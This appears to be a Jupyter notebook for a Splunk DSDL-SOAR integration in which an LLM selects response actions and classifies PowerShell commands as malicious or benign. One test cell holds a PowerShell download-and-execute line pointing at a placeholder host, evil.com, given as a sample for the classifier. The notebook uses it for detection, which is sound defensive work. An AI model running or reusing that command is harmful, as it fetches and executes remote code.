# LLM Decision Making Script for DSDL-SOAR Integration

This notebook contains the script behind the **LLM decision making** custom function on Splunk SOAR. It provides an example of how DSDL can be integrated with SOAR.

## Stage 0 - import libraries
At stage 0 we define all imports that the subsequent code depends on.

In [2]:
# this definition exposes all python module imports that should be available in all subsequent commands
import json
import numpy as np
import pandas as pd
import requests

from llama_index.llms.azure_openai import AzureOpenAI
from llama_index.core.prompts import ChatPromptTemplate
from llama_index.core.llms import ChatMessage
from llama_index.core.llms.structured_llm import StructuredLLM
from typing import List
from pydantic import BaseModel, Field
from llama_index.core.program import LLMTextCompletionProgram
from llama_index.core.prompts import PromptTemplate
from llama_index.core.output_parsers import PydanticOutputParser
from llama_index.core.tools import ToolMetadata
from llama_index.core.selectors import LLMSingleSelector
from app.model.llm_utils import create_llm, create_embedding_model, create_vector_db
# ...
# global constants
MODEL_DIRECTORY = "/srv/app/model/data/"

## Example 1: Use LLM as a tool selector

In [15]:
# choices as a list of tool metadata
choices = [
    ToolMetadata(description="quarantine the server", name="quarantine_tool"),
    ToolMetadata(description="update route table", name="route_table_tool"),
]

llm, m = create_llm(service="azure_openai")
print(m)

Initializing LLM object from azure_openai
Successfully created LLM object from azure_openai


In [17]:
selector = LLMSingleSelector.from_defaults(llm=llm)
selector_result = selector.select(
    choices, query="We have identified a compromised server."
)
print("Decision: " + choices[selector_result.selections[0].index].name)
print("Reason: " + selector_result.selections[0].reason)

Decision: quarantine_tool
Reason: The most relevant choice is to quarantine the server because it has been identified as compromised. Quarantining the server will help prevent further damage and contain the potential threat.


In [18]:
selector = LLMSingleSelector.from_defaults(llm=llm)
selector_result = selector.select(
    choices, query="We have identified that some routing info are missing"
)
print("Decision: " + choices[selector_result.selections[0].index].name)
print("Reason: " + selector_result.selections[0].reason)

Decision: route_table_tool
Reason: Updating the route table can help resolve missing routing information.
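
Once the selector has returned a tool name, the calling playbook still has to act on it. The sketch below shows one way this could be wired up in plain Python: a dictionary maps each tool name from `choices` to a handler. The handlers `quarantine_server` and `update_route_table` and the `dispatch` helper are hypothetical placeholders for illustration; they are not part of DSDL or SOAR.

```python
# Hypothetical handlers; in a real playbook these would trigger SOAR actions.
def quarantine_server(target):
    return f"quarantine requested for {target}"


def update_route_table(target):
    return f"route table update requested for {target}"


# Keys match the ToolMetadata names used in `choices` above.
HANDLERS = {
    "quarantine_tool": quarantine_server,
    "route_table_tool": update_route_table,
}


def dispatch(decision, target):
    """Run the handler registered for a selector decision; refuse unknown names."""
    handler = HANDLERS.get(decision)
    if handler is None:
        raise ValueError(f"no handler registered for decision {decision!r}")
    return handler(target)


print(dispatch("quarantine_tool", "server-01"))
```

Rejecting unknown names explicitly keeps an unexpected LLM answer from silently triggering the wrong action.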


## Example 2: Use LLM as a classifier

In [None]:
query = '''Is the following powershell command malicious?  
get compute info'''
bool_choices = [
    ToolMetadata(description="The powershell command is malicious", name="True"),
    ToolMetadata(description="The powershell command is benign", name="False"),
]

llm, m = create_llm(service="azure_openai")
print(m)

bool_selector = LLMSingleSelector.from_defaults(llm=llm)
bool_selector_result = bool_selector.select(
    bool_choices, query=query
)
print("Decision: " + bool_choices[bool_selector_result.selections[0].index].name)
print("Reason: " + bool_selector_result.selections[0].reason)
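
The classifier reports its label as the string `"True"` or `"False"`, so downstream logic needs to convert it before branching on it. A minimal sketch, assuming the decision is always one of those two names; `decision_to_bool` is a hypothetical helper and not part of the notebook.

```python
def decision_to_bool(decision):
    """Map the selector's label name to a Python bool."""
    mapping = {"True": True, "False": False}
    if decision not in mapping:
        raise ValueError(f"unexpected decision label: {decision!r}")
    return mapping[decision]


is_malicious = decision_to_bool("False")
print(is_malicious)
```

An explicit mapping is used because `bool("False")` evaluates to `True` in Python: any non-empty string is truthy.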

## Stage 1 - get a data sample from Splunk
In Splunk, run a search to pipe a dataset into your notebook environment. Note: mode=stage is passed to the | fit command to do this.

In [4]:
# this cell is not executed from MLTK and should only be used for staging data into the notebook environment
def stage(name):
    with open("data/"+name+".csv", 'r') as f:
        df = pd.read_csv(f)
    with open("data/"+name+".json", 'r') as f:
        param = json.load(f)
    return df, param

In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
df, param = stage("soar_llm_prompt_formatted")
print(df.describe())
print(param)

## Stage 2 - create and initialize a model

In [None]:
# initialize your model
# available inputs: data and parameters
# returns the model object which will be used as a reference to call fit, apply and summary subsequently
def init(df,param):
    model = {}
    model['hyperparameter'] = 42.0
    return model

In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
# keep a reference to the model so the fit and apply test cells below can use it
model = init(df,param)
print(model)

## Stage 3 - fit the model

In [None]:
# train your model
# returns a fit info json object and may modify the model object
def fit(model,df,param):
    # model.fit()
    info = {"message": "model trained"}
    return info

In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
print(fit(model,df,param))

## Stage 4 - apply the model

In [3]:
def apply(model,df,param):
    # select the LLM service from the search parameters; fall back to Ollama
    try:
        llm_service = param['options']['params']['llm_service'].strip("\"")
        print(f"Using {llm_service} LLM service.")
    except Exception:
        llm_service = "ollama"
        print("Using default Ollama LLM service.")

    if llm_service == "ollama": 
        # Ollama needs an explicit model name
        try:
            model_name = param['options']['params']['model_name'].strip("\"")
        except Exception:
            returns=pd.DataFrame({"decision": [None], "reason": ["ERROR: Please specify model_name input for using Ollama LLMs"]})
            return returns
        llm, m = create_llm(service='ollama', model=model_name)
    else:
        llm, m = create_llm(service=llm_service)
    
    # prompt (the question) and context (the data to judge) are both required
    try:
        prompt = param['options']['params']['prompt'].strip("\"")
        context = param['options']['params']['context'].strip("\"")
    except Exception:
        returns=pd.DataFrame({"decision": [None], "reason": ["ERROR: Please specify prompt and context inputs"]})
        return returns

    query = f'''{prompt}
    ----------------------
    {context}
    '''
    
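    # labels and descriptions are JSON-encoded lists of equal length
    try:
        labels = json.loads(param['options']['params']['labels'])
        descriptions = json.loads(param['options']['params']['descriptions'])
        if len(labels) != len(descriptions):
            raise ValueError("labels and descriptions must have the same length")
    except Exception as e: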
        returns=pd.DataFrame({"decision": [None], "reason": [f"ERROR loading labels and descriptions: {e}"]})
        return returns

    # one ToolMetadata entry per label, described by the matching description
    choices = [
        ToolMetadata(description=description, name=label)
        for label, description in zip(labels, descriptions)
    ]

    selector = LLMSingleSelector.from_defaults(llm=llm)
    try:
        selector_result = selector.select(
            choices, query=query
        )
        decision = choices[selector_result.selections[0].index].name
        reason = selector_result.selections[0].reason
        returns=pd.DataFrame({"decision": [decision], "reason": [reason]})
        return returns
    except Exception as e:
        returns=pd.DataFrame({"decision": [None], "reason": [f"ERROR receiving response from LLM: {e}"]})
        return returns
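
`apply` reads its inputs from `param['options']['params']`: `prompt` and `context` are required strings, `labels` and `descriptions` are JSON-encoded lists of equal length, and `llm_service` and `model_name` are optional (with `model_name` required when the service is Ollama). The sketch below assembles such a dictionary for local testing. The helper name `build_param` and the variable `param_example` are hypothetical, and the example values are taken from Example 2 above.

```python
import json


def build_param(prompt, context, labels, descriptions,
                llm_service=None, model_name=None):
    """Assemble a param dict with the keys that apply() reads."""
    if len(labels) != len(descriptions):
        raise ValueError("labels and descriptions must have the same length")
    params = {
        "prompt": prompt,
        "context": context,
        # apply() parses these two with json.loads, so they are JSON strings
        "labels": json.dumps(labels),
        "descriptions": json.dumps(descriptions),
    }
    # optional keys: apply() falls back to Ollama when llm_service is absent
    if llm_service is not None:
        params["llm_service"] = llm_service
    if model_name is not None:
        params["model_name"] = model_name
    return {"options": {"params": params}}


param_example = build_param(
    prompt="Is the following powershell command malicious?",
    context="get compute info",
    labels=["True", "False"],
    descriptions=["The powershell command is malicious",
                  "The powershell command is benign"],
    llm_service="azure_openai",
)
print(json.dumps(param_example, indent=2))
```

Passing the resulting dictionary as the third argument of `apply` exercises the same code path as a call from Splunk, provided the chosen LLM service is reachable.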

In [4]:
param = {'options':{'params':{'prompt': "Is the following powershell command malicious?", "query":"IEX (New-Object Net.WebClient).DownloadString(http://evil.com/malware.ps1)"}}}

a = apply(None, None, param)
a

Initializing LLM object from ollama


Unnamed: 0,is_positive,reason
0,True,The PowerShell command uses `Invoke-Expression...


In [None]:
# THIS CELL IS NOT EXPORTED - free notebook cell for testing or development purposes
print(apply(model,df,param))

## Stage 5 - save the model

In [None]:
# save model to name in expected convention "<algo_name>_<model_name>"
def save(model,name):
    with open(MODEL_DIRECTORY + name + ".json", 'w') as file:
        json.dump(model, file)
    return model

## Stage 6 - load the model

In [None]:
# load model from name in expected convention "<algo_name>_<model_name>"
def load(name):
    model = {}
    with open(MODEL_DIRECTORY + name + ".json", 'r') as file:
        model = json.load(file)
    return model
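
Because `save` and `load` go through `json.dump` and `json.load`, the model object must be JSON-serializable, as the dictionary returned by `init` is. The round trip can be checked without touching `MODEL_DIRECTORY` by using a temporary directory. This is a minimal sketch: `save_to` and `load_from` are hypothetical variants that take the directory as an argument, and the model name is made up for the example.

```python
import json
import os
import tempfile


def save_to(directory, model, name):
    """Write the model as <name>.json inside the given directory."""
    with open(os.path.join(directory, name + ".json"), "w") as file:
        json.dump(model, file)
    return model


def load_from(directory, name):
    """Read <name>.json from the given directory back into a dict."""
    with open(os.path.join(directory, name + ".json"), "r") as file:
        return json.load(file)


with tempfile.TemporaryDirectory() as tmp:
    original = {"hyperparameter": 42.0}
    save_to(tmp, original, "llm_decision_example")
    restored = load_from(tmp, "llm_decision_example")

# True when the model survived the round trip unchanged
print(restored == original)
```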

## Stage 7 - provide a summary of the model

In [21]:
# return a model summary
def summary(model=None):
    returns = {"version": {"numpy": np.__version__, "pandas": pd.__version__} }
    return returns